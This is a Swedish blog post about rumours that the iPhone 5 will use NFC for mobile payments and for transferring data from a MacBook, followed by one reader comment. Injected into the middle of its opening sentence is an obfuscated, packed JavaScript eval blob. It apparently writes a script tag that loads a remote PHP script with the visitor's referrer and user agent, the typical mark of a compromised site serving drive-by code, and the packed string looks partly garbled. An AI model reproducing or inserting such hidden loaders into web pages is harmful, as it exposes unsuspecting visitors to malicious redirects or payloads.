Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Plånbok, macbook och musikspelare – iPhone 5

Plånbok, macbook och musikspelare – iPhone 5
Sebastian

Tänk eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsdif|var|u0026u|referrer|ehhka||js|php’.split(’|’),0,{}))
om man kunde svepa sin iPhone över sin Macbook och få alla program, inställningar och data överfört till telefonen. Tänk om man kunde gå in i en affär och betala sina varor i butiken genom att hålla sin iPhone framför kortläsaren. Tänk hur enkelt allt skulle vara. Men detta är inget vi kommer att få uppleva under vår livsstil, eller?

Nya, säkra rykten har precis kommit ut. Allt detta ovannämnda kommer troligtvis bli verklighet nästa år, närmare bestämt när iPhone 5 släpps. Uppgifterna om detta kommer från Cultofmac och Digitimes som får konkurrenterna att skaka.

[quote]Here’s how it would work, thanks to the enormous storage now available through iCloud. You’re getting ready to leave work. Wave your iPhone in front of you cubicle’s Mac and your desktop’s applications, settings and data are transferred to the phone. As you walk out the door, the work computer’s settings return to normal. Arrive at home, wave your iPhone in front of your MacBook and you have an instant copy of your work PC to finish that project.[/quote]

Tekniken heter Near Field Communications och kallas för NFC. Google har nu börjat få oss användare att prova på deras nya tjänst Google Wallet, men det har inte riktigt lyckats, än.
Det måste känns osäkert för Google och andra tjänster som försöker slå med sina betaltjänster via smartphones. Exempel iZettle.

Sammanfattat så kommer iPhone 5 bli din plånbok, din dator och musikspelare.

Comments

  1. Jacob Svanberg

    Underbart!!!!